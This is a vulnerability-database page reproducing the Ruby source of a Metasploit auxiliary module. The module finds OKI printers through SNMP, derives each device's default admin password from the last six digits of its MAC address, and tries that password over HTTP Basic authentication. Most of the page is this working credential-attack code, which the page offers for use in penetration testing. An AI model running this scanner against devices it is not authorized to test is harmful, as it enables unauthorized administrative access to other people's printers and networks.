Lucene search
K

OKI Printer Default Login Credential Scanner

🗓️ 20 Dec 2011 09:09:09Reported by antr6X <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 26 Views

OKI Printer Default Login Credential Scanner via SNMP and HTTP to find and connect with default admin credentials derived from the MAC address

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# TODO: Split this module into two separate SNMP and HTTP modules.

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SNMPClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'OKI Printer Default Login Credential Scanner',
      'Description'   => %q{
        This module scans for OKI printers via SNMP, then tries to connect to found devices
        with vendor default administrator credentials via HTTP authentication. By default, OKI
        network printers use the last six digits of the MAC as admin password.
      },
      'Author'        => 'antr6X <anthr6x[at]gmail.com>',
      'License'       => MSF_LICENSE
    ))

    register_options(
      [
        OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),
        OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])
      ])

    deregister_options('RPORT', 'VHOST')
  end

  def cleanup
    datastore['RPORT'] = @org_rport
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def run_host(ip)
    @org_rport = datastore['RPORT']
    datastore['RPORT'] = datastore['SNMPPORT']

    index_page = "index_ad.htm"
    auth_req_page = "status_toc_ad.htm"
    snmp = connect_snmp()

    snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac|
      last_six  = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase
      first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase

      # check if it is a OKI
      # OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
      if first_six ==  "002536" || first_six == "008087" || first_six == "002536"
        sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
        print_status("Found: #{sys_name}")
        print_status("Trying credential: admin/#{last_six}")

        tcp = Rex::Socket::Tcp.create(
          'PeerHost' => rhost,
          'PeerPort' => datastore['HTTPPORT'],
          'Context' =>
            {
              'Msf'=>framework,
              'MsfExploit'=>self
            }
        )

        auth = Rex::Text.encode_base64("admin:#{last_six}")

        http_data = "GET /#{auth_req_page} HTTP/1.1\r\n"
        http_data << "Referer: http://#{ip}/#{index_page}\r\n"
        http_data << "Authorization: Basic #{auth}\r\n\r\n"

        tcp.put(http_data)
        data = tcp.recv(12)

        response = "#{data[9..11]}"

        case response
        when "200"
          print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}")
          report_cred(
            ip: rhost,
            port: datastore['HTTPPORT'],
            service_name: 'http',
            user: 'admin',
            password: last_six,
            proof: response.inspect
          )
        when "401"
          print_error("Default credentials failed")
        when "404"
          print_status("Page not found, try credential manually: admin/#{last_six}")
        else
          print_status("Unexpected message")
        end

        disconnect()
      end
    end

    # No need to make noise about timeouts
    rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
    ensure
      disconnect_snmp
    end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation